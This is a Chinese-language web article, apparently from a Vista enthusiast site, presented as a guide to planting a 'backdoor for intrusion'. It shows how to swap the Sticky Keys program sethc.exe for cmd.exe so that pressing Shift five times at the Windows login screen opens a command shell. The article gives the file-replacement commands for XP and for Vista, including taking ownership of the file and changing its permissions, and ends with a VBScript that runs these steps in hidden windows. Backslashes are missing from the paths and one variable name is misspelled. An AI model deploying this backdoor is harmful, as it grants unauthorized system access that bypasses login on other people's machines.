利用粘滞键打造入侵Vista超酷后门

核心提示：什么是粘滞键？当你在Windows操作系统里面连续按下5次Shift键之后，你看看出来了什么？在windows 2000/xp/Vista下，利用粘滞键打造入侵Vista超酷后门，按shift键5次，可以打开粘置，然后在sethc.exe文件上面右键直接提升权限，然后按XP方法替换文件在登录界面按5此SHIFT，会运行

什么是粘滞键？

当你在Windows操作系统里面连续按下5次Shift键之后，你看看出来了什么？

在windows 2000/xp/Vista下，按shift键5次，可以打开粘置，会运行sethc.exe，而且，在登录界面里也可以打开。这就让人联想到WINDOWS的屏保，将程序替换成cmd.exe后，就可以打开shell了。

一、具体的替换方法：

XP系统：

将安装源光盘弹出（或将硬盘上的安装目录改名)

cd %widnir%system32dllcache

ren sethc.exe *.ex~

cd %widnir%system32

copy /y cmd.exe sethc.exe

Vista系统：

takeown /f c:windowssystem32sethc.exe

cacls c:windowssystem32sethc.exe /G administrator:F

Vista之家（www.vista123.com）备注：上两步为获得权限的命令，你也可以通过Vista优化大师获得右键菜单的提升权限的功能，然后在sethc.exe文件上面右键直接提升权限。

然后按XP方法替换文件

在登录界面按5此SHIFT，出来cmd shell，然后……

二、后门扩展：

Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%system32sethc.exe", 0, True)
success = obj.run("cmd /c echo y　 cacls %SystemRoot%system32sethc.exe /G %USERNAME%:F", 0, True)
success = obj.run("cmd /c copy %SystemRoot%system32cmd.exe %SystemRoot%system32acmd.exe", 0, True)
success = obj.run("cmd /c copy %SystemRoot%system32sethc.exe %SystemRoot%system32asethc.exe", 0, True)
success = obj.run("cmd /c del %SystemRoot%system32sethc.exe", 0, True)
success = obj.run("cmd /c ren %SystemRoot%system32acmd.exe sethc.exe", 0, True)